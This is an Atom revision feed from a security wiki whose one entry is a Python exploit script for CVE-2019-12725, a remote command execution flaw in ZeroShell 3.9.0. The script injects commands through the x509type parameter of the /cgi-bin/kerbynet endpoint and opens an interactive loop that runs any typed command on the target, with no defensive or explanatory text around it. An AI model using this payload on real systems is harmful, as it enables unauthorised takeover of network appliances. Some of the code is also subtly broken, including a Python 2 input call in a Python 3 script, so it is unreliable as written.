<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-12725_ZeroShell_3.9.0_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2019-12725 ZeroShell 3.9.0 遠程命令執行漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2019-12725_ZeroShell_3.9.0_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-12725_ZeroShell_3.9.0_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-10T04:31:06Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2019-12725_ZeroShell_3.9.0_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2846&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: ZeroShell 3.9.0 - Remote Command Execution  # Date: 10/05/2021 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://zeroshell.org/ # So...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-12725_ZeroShell_3.9.0_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&amp;diff=2846&amp;oldid=prev"/>
		<updated>2021-05-13T09:27:36Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: ZeroShell 3.9.0 - Remote Command Execution  # Date: 10/05/2021 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://zeroshell.org/ # So...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: ZeroShell 3.9.0 - Remote Command Execution &lt;br /&gt;
# Date: 10/05/2021&lt;br /&gt;
# Exploit Author: Fellipe Oliveira&lt;br /&gt;
# Vendor Homepage: https://zeroshell.org/&lt;br /&gt;
# Software Link: https://zeroshell.org/download/&lt;br /&gt;
# Version: &amp;lt; 3.9.0 &lt;br /&gt;
# Tested on: ZeroShell 3.9.0&lt;br /&gt;
# CVE : CVE-2019-12725&lt;br /&gt;
&lt;br /&gt;
#!/usr/bin/python3&lt;br /&gt;
&lt;br /&gt;
import requests&lt;br /&gt;
import optparse&lt;br /&gt;
import time&lt;br /&gt;
&lt;br /&gt;
parser = optparse.OptionParser()&lt;br /&gt;
parser.add_option('-u', '--url', action=&amp;quot;store&amp;quot;, dest=&amp;quot;url&amp;quot;, help='Base target uri (ex. http://target-uri/)')&lt;br /&gt;
&lt;br /&gt;
options, args = parser.parse_args()&lt;br /&gt;
if not options.url:&lt;br /&gt;
    print('[+] Specify an url target')&lt;br /&gt;
    print('[+] Example usage: exploit.py -u http://target-uri/')&lt;br /&gt;
    print('[+] Example help usage: exploit.py -h')&lt;br /&gt;
    exit()&lt;br /&gt;
&lt;br /&gt;
uri_zeroshell = options.url&lt;br /&gt;
session = requests.Session()&lt;br /&gt;
&lt;br /&gt;
def command():&lt;br /&gt;
    try:&lt;br /&gt;
        check = session.get(uri_zeroshell + &amp;quot;/cgi-bin/kerbynet?Action=x509view&amp;amp;Section=NoAuthREQ&amp;amp;User=&amp;amp;x509type='%0Aid%0A'&amp;quot;)&lt;br /&gt;
        if check.status_code == 200:&lt;br /&gt;
            flag = True&lt;br /&gt;
            print('[+] ZeroShell 3.9.0 Remote Command Execution')&lt;br /&gt;
            time.sleep(1)&lt;br /&gt;
            print('[+] Success connect to target')&lt;br /&gt;
            time.sleep(1)&lt;br /&gt;
            print('[+] Trying to execute command in ZeroShell OS...\n')&lt;br /&gt;
            time.sleep(1)&lt;br /&gt;
            check.raise_for_status()  &lt;br /&gt;
&lt;br /&gt;
        while flag:&lt;br /&gt;
            cmd = raw_input(&amp;quot;$ &amp;quot;)&lt;br /&gt;
            payload = &amp;quot;/cgi-bin/kerbynet?Action=x509view&amp;amp;Section=NoAuthREQ&amp;amp;User=&amp;amp;x509type='%0A&amp;quot; + cmd + &amp;quot;%0A'&amp;quot;&lt;br /&gt;
            uri_vuln = uri_zeroshell + payload&lt;br /&gt;
            burp0_headers = {&amp;quot;User-Agent&amp;quot;: &amp;quot;Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0&amp;quot;, &amp;quot;Accept&amp;quot;: &amp;quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&amp;quot;, &amp;quot;Accept-Language&amp;quot;: &amp;quot;en-US,en;q=0.5&amp;quot;, &amp;quot;Accept-Encoding&amp;quot;: &amp;quot;gzip, deflate&amp;quot;, &amp;quot;Connection&amp;quot;: &amp;quot;close&amp;quot;, &amp;quot;Upgrade-Insecure-Requests&amp;quot;: &amp;quot;1&amp;quot;}&lt;br /&gt;
            res = session.get(uri_vuln, headers=burp0_headers, verify=False)&lt;br /&gt;
            print(res.text[:res.text.rindex(&amp;quot;&amp;lt;html&amp;gt;&amp;quot;) / 2])&lt;br /&gt;
&lt;br /&gt;
    except requests.exceptions.ConnectionError as err:&lt;br /&gt;
        print('[x] Failed to Connect in: '+uri_zeroshell+' ')&lt;br /&gt;
        print('[x] This host seems to be Down')&lt;br /&gt;
        exit()&lt;br /&gt;
    except requests.exceptions.HTTPError as conn:&lt;br /&gt;
        print('[x] Failed to execute command in: '+uri_zeroshell+' ')&lt;br /&gt;
        print('[x] This host does not appear to be a ZeroShell')&lt;br /&gt;
        exit()&lt;br /&gt;
&lt;br /&gt;
command()&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>